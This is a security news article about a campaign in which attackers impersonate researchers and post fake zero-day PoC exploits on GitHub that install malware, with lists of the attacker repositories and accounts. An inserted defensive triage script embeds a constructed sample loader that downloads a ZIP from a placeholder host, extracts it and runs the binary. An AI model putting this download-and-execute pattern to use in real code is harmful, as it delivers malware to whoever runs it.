Hackers Post Fake PoC Exploits on GitHub to Distribute Malware

Written by Emma Davis

The attackers pose as security researchers on Twitter and GitHub, publishing fake PoC exploits for various zero-day vulnerabilities. Under the guise of exploits, they distribute malware that infects Windows and Linux machines.

Experts from VulnCheck were the first to notice this malicious campaign. According to them, the attackers have been active since May 2023 and are actively promoting online fake exploits for vulnerabilities in Chrome, Discord, Signal, WhatsApp and Microsoft Exchange.

[Figure: Malicious repository]

Let me remind you that we also wrote that miners abuse GitHub infrastructure and that many repositories on GitHub are cloned and distribute malware.

Information security specialists have also pointed out that attackers can use GitHub Codespaces to host and deliver malware.

The fakes are spread on behalf of the defunct security company High Sierra Cyber Security and are actively promoted on Twitter so that researchers and vulnerability analysis firms take an interest in them.

The attackers' repositories look legitimate, and their maintainers pose as real experts from Rapid7 and other well-known companies, even using those people's real photos.

[Figure: Fake profile]

In all the cases studied, the attackers' repositories contain a Python script, poc.py, that acts as a malware loader for Linux and Windows. The script downloads a ZIP archive from an external URL to the victim's computer; depending on the operating system, the target receives either cveslinux.zip (Linux) or cveswindows.zip (Windows).

The archive is stored in the %Temp% folder on Windows or in /home//.local/share on Linux, then extracted and executed. VulnCheck notes that the Windows binary contained in the ZIP archive (cves_windows.exe) is detected by more than 60% of the scanners on VirusTotal, while the Linux binary (cves_linux) was much stealthier: at the time of the report it was detected by only three scanners, though that number has since risen.
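The loader chain described above (OS check, download a ZIP, drop it under %Temp% or ~/.local/share, extract, execute) is exactly what a researcher should look for before running any "PoC" pulled from an unknown repository. The following static triage script is an added example, not code from VulnCheck or from the article; the indicator lists and the constructed sample script (placeholder example.invalid URL) are assumptions, and the verdict only says the chain is present, not that the file is malicious.

```python
import ast

# Call/attribute names for the stages the report describes in poc.py.
DOWNLOAD = {"urllib.request.urlretrieve", "urllib.request.urlopen", "requests.get"}
EXTRACT = {"zipfile.ZipFile", "extractall", "tarfile.open"}
EXECUTE = {"subprocess.Popen", "subprocess.run", "subprocess.call", "os.system", "os.startfile"}
OS_BRANCH = {"platform.system", "os.name", "sys.platform"}
DROP_PATHS = ("TEMP", "TMP", ".local/share", "AppData")
STAGES = (("download", DOWNLOAD), ("extract", EXTRACT), ("execute", EXECUTE), ("os_branch", OS_BRANCH))

def dotted(node):
    # Render a Name/Attribute chain (urllib.request.urlretrieve) as a string.
    parts = []
    while isinstance(node, ast.Attribute):
        parts.append(node.attr)
        node = node.value
    if isinstance(node, ast.Name):
        return ".".join(reversed(parts + [node.id]))
    return parts[0] if parts else ""  # method on a call result, e.g. ZipFile(...).extractall

def triage(source):
    # Return a verdict and the loader-stage indicators found by static inspection.
    found = {k: set() for k in ("download", "extract", "execute", "os_branch", "drop_path")}
    for node in ast.walk(ast.parse(source)):
        if isinstance(node, ast.Call):
            name = dotted(node.func)
            for key, names in STAGES:
                if name in names:
                    found[key].add(name)
        elif isinstance(node, ast.Attribute) and dotted(node) in OS_BRANCH:
            found["os_branch"].add(dotted(node))  # os.name / sys.platform read without a call
        elif isinstance(node, ast.Constant) and isinstance(node.value, str):
            found["drop_path"].update(p for p in DROP_PATHS if p in node.value)
    # download -> extract -> execute together is what turns a "PoC" into a loader.
    stages = sum(1 for k in ("download", "extract", "execute") if found[k])
    verdict = {3: "loader-like", 2: "review"}.get(stages, "no loader chain")
    return {"verdict": verdict, "indicators": {k: sorted(v) for k, v in found.items()}}

# Constructed sample: a skeleton mirroring the reported behaviour, with a placeholder URL.
SUSPICIOUS = '''
import platform, urllib.request, zipfile, subprocess, os
url = "https://example.invalid/cveswindows.zip" if platform.system() == "Windows" else "https://example.invalid/cveslinux.zip"
dest = os.path.join(os.environ.get("TEMP", os.path.expanduser("~/.local/share")), "cves.zip")
urllib.request.urlretrieve(url, dest)
zipfile.ZipFile(dest).extractall(os.path.dirname(dest))
subprocess.Popen([os.path.join(os.path.dirname(dest), "cves_windows.exe")])
'''
```

Run triage() over every .py file in a freshly cloned PoC repository before executing anything; a "review" or "loader-like" verdict means read the script by hand first, ideally in an isolated VM.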

It is not yet clear what type of malware the attackers are spreading, but both executables install the TOR client, and the Windows version is sometimes found to be a password-stealing Trojan.

Although the scope and effectiveness of this campaign are unclear, VulnCheck notes that the hackers are very aggressive in creating new accounts and repositories when the old ones are discovered and deleted.

There are currently seven GitHub repositories known to be owned by these attackers:

  1. github.com/AKuzmanHSCS/Microsoft-Exchange-RCE
  2. github.com/MHadzicHSCS/Chrome-0-day
  3. github.com/GSandersonHSCS/discord-0-day-fix
  4. github.com/BAdithyaHSCS/Exchange-0-Day
  5. github.com/RShahHSCS/Discord-0-Day-Exploit
  6. github.com/DLandonHSCS/Discord-RCE
  7. github.com/SsankkarHSCS/Chromium-0-Day

In addition, the following Twitter accounts are owned by the attackers:

  1. twitter.com/AKuzmanHSCS
  2. twitter.com/DLandonHSCS
  3. twitter.com/GSandersonHSCS
  4. twitter.com/MHadzicHSCS

It is worth saying that this is not the first case of targeted attacks on information security experts, nor the first time hackers have distributed fake exploits (1, 2). By attacking members of the cybersecurity community, attackers in theory gain not only access to vulnerability research the victim may be working on, but potentially also access to a cybersecurity company's network, which can be a real gold mine for hackers.


About the author

Emma Davis

I'm a writer and content manager (I recently completed a bachelor's degree in Marketing at Gustavus Adolphus College). For now, I have a deep drive to study cyber security.
